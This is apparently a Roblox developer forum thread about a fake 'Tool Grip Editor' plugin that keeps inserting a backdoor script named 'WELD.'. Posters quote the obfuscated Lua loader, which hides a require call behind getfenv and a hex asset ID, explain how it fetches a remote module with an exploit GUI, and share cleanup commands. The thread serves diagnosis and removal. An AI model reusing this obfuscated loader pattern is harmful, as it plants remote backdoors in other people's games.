Whenever im scripting something else I always search “Scripts” on explorer.
And everytime I see this on an script named “WELD.”;
And that was from tool grip editor. if you have it try to search WELD. in your explorer;
pcall(function()
local fenv = getfenv
local ADDR = 0x19F996F0A;
local INST = "re"
pcall(fenv()[INST.."qui"..INST](ADDR))
end)
It is, delete all of them like that.
I do, but whevener I do that it creats another one. It’s like infinite virus on my game. I wanted to know how to remove this forever or what is causing it.
Check your plugins, try remove any you are not using and make sure the owners of the plugin are authentic.
I didnt check if i coded this right, but: on studio, not running the game, execute the following code on the command bar, changing VIRUSSCRIPTNAMEHERE to the virus name:
local d = workspace:GetDescendants()
for i=1,#d do
If d[i].Name == “VIRUSSCRIPTNAMEHERE” and d[i]:IsA(“BaseScript”) then d[i]:Destroy() end end
If the virus spreads to other places outside of workspace, like game.Lighting, repeat the command changing workspace with the directory you want.
Also use this every time you insert a free model but dont want any of its scripts:
local d = workspace.FREEMODELNAME:GetDescendants()
for i=1,#d do
If d[i]:IsA(“BaseScript”) then d[i]:Destroy() end end
If you saw random local variables or anything like this;
you should delete it
Yes, almost everything with getfenv() is a virus, I’ll try to explain what the script does
-- Suppress the function from any errors/warnings (thanks incapaz)
pcall(function()
local ADDR = 0x19F996F0A;
-- The ADDR here is an address that can be converted back into words/numbers
local INST = "re"
-- The INST here is used to continue the word 'require'
-- Suppress the function/line from any errors/warnings (thank incapaz again)
pcall(getfenv()[INST.."qui"..INST](ADDR))
-- It requires/adds to your game this specific model/script
end)
I don’t think that’s a new thread necessarily? That is so if any exception occurs any indication of it would be suppressed.
Oh, that’s my bad, I edited my original post now, thanks. (i forgot spawn() creates a new thread and not pcall())
yeah. 0x19F996F0A is a hex number which in decimal is 6972600074 so it requires a module with this id. you can now use:
game:GetObjects('rbxassetid://6972600074')[1].Parent = workspace
in the command bar to insert the module in the workspace and check the source (which is obfuscated…) there’s also a GUI in the module and if you put it in the StarterGui, sure enough, it’s a backdoor:
Yep its a virus, I just investigated and leads to this module script;
essentially what it does is it inserts a module script with the ID 0x19F996F0A which is hexadecimal for 6972600074. The code in the module script is obfuscated, so I can’t really read what it does, but in essence it inserts the GUI below into your game, I am guessing would allow whoever is behind it to exploit in your game
Well, I fixed it. for some reason it was from “tool grip editor” it was 5 robux…
Also some dude hacked my game with zardiserverside
he’s name was memiguel555
report him!
I am trying hard to de-obfuscate the code and see what it precisely does
I did, but im still confused how he discover my game cause like me and my friend was testing the game while he came up with an raid so we would be distracted and he could execute his scripts.
But memiguel555 isn’t the creator of tool grip editor. So I really don’t know how he discover maybe it’s an key that you can press?
Be careful with plugins that you install;
Thanks but, it doens’t put straight up to the explorer. it put at random locations and some of them like at StarterPack
Well, I thought tool grip editor was good cause it was paid and people on yt said it was cool.!
yea, I guess this explains the massive exploiting problem that we face. Currently you don’t need to insert a module script into the game to run it, you simply need to require it. This is what the code does, and the module script returns a function, which is then called to start the process
While that I saw that the plugin is fake, they had an group with
CloneTrooper1019 name and then I got tricked,
WOW. roblox needs to do something about this. If roblox at least added some way to know when someone calls require with an ID, then you could thwart these exploits before they begin
